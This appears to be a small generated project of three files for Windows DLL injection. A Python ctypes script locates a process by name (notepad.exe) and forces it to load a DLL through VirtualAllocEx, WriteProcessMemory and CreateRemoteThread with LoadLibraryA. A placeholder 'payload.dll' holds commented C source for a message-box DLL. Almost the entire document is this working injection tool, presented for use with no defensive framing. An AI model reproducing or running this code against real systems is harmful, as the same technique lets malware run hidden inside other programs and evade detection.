[
    {
        "file_name": "injector.py",
        "file_content": "import ctypes\nimport ctypes.wintypes\nfrom ctypes import wintypes\n\n# Define the necessary constants and structures\nPROCESS_ALL_ACCESS = 0x1F0FFF\nTH32CS_SNAPPROCESS = 0x00000002\n\nclass PROCESSENTRY32(ctypes.Structure):\n    _fields_ = [\n        (\"dwSize\", wintypes.DWORD),\n        (\"cntUsage\", wintypes.DWORD),\n        (\"th32ProcessID\", wintypes.DWORD),\n        (\"th32DefaultHeapID\", wintypes.PULONG),\n        (\"th32ModuleID\", wintypes.DWORD),\n        (\"cntThreads\", wintypes.DWORD),\n        (\"th32ParentProcessID\", wintypes.DWORD),\n        (\"pcPriClassBase\", wintypes.LONG),\n        (\"dwFlags\", wintypes.DWORD),\n        (\"szExeFile\", wintypes.CHAR * 260)\n    ]\n\ndef get_process_id_by_name(process_name):\n    \"\"\"\n    Retrieve the process ID of a target process by its name.\n    :param process_name: Name of the target process.\n    :return: Process ID of the target process.\n    \"\"\"\n    snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)\n    process_entry = PROCESSENTRY32()\n    process_entry.dwSize = ctypes.sizeof(PROCESSENTRY32)\n\n    if not ctypes.windll.kernel32.Process32First(snapshot, ctypes.byref(process_entry)):\n        return None\n\n    while True:\n        if process_entry.szExeFile.decode('utf-8').lower() == process_name.lower():\n            ctypes.windll.kernel32.CloseHandle(snapshot)\n            return process_entry.th32ProcessID\n        if not ctypes.windll.kernel32.Process32Next(snapshot, ctypes.byref(process_entry)):\n            break\n\n    ctypes.windll.kernel32.CloseHandle(snapshot)\n    return None\n\ndef inject_payload(target_pid, payload_path):\n    \"\"\"\n    Inject a payload into the target process.\n    :param target_pid: Process ID of the target process.\n    :param payload_path: Path to the payload DLL.\n    \"\"\"\n    h_process = ctypes.windll.kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, target_pid)\n    if not h_process:\n        raise Exception(\"Failed to open target process.\")\n\n    payload_address = ctypes.windll.kernel32.VirtualAllocEx(h_process, 0, len(payload_path) + 1, 0x1000 | 0x20, 0x40)\n    if not payload_address:\n        raise Exception(\"Failed to allocate memory in target process.\")\n\n    if not ctypes.windll.kernel32.WriteProcessMemory(h_process, payload_address, payload_path.encode('utf-8'), len(payload_path) + 1, None):\n        raise Exception(\"Failed to write payload path to target process memory.\")\n\n    thread_id = ctypes.windll.kernel32.CreateRemoteThread(h_process, None, 0, ctypes.windll.kernel32.GetProcAddress(ctypes.windll.kernel32.GetModuleHandleW(\"kernel32.dll\"), b\"LoadLibraryA\"), payload_address, 0, None)\n    if not thread_id:\n        raise Exception(\"Failed to create remote thread in target process.\")\n\n    ctypes.windll.kernel32.WaitForSingleObject(thread_id, -1)\n    ctypes.windll.kernel32.CloseHandle(h_process)\n    ctypes.windll.kernel32.CloseHandle(thread_id)"
    },
    {
        "file_name": "payload.dll",
        "file_content": "# This file represents the payload DLL. In a real scenario, this would be a compiled DLL.\n# For demonstration, we'll assume this is a simple DLL that prints a message.\n# The actual content of this file would be the compiled binary of the DLL.\n\n# Example content of payload.dll (in C):\n/*\n#include <windows.h>\n#include <stdio.h>\n\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {\n    switch (ul_reason_for_call) {\n        case DLL_PROCESS_ATTACH:\n            MessageBoxA(NULL, \"Payload injected!\", \"Info\", MB_OK);\n            break;\n        case DLL_THREAD_ATTACH:\n        case DLL_THREAD_DETACH:\n        case DLL_PROCESS_DETACH:\n            break;\n    }\n    return TRUE;\n}\n*/"
    },
    {
        "file_name": "main.py",
        "file_content": "import injector\n\ndef main():\n    target_process_name = \"notepad.exe\"  # Example target process\n    payload_path = \"path\\\\to\\\\payload.dll\"  # Path to the payload DLL\n\n    target_pid = injector.get_process_id_by_name(target_process_name)\n    if target_pid:\n        print(f\"Target process ID: {target_pid}\")\n        injector.inject_payload(target_pid, payload_path)\n        print(\"Payload injected successfully.\")\n    else:\n        print(\"Target process not found.\")\n\nif __name__ == \"__main__\":\n    main()"
    }
]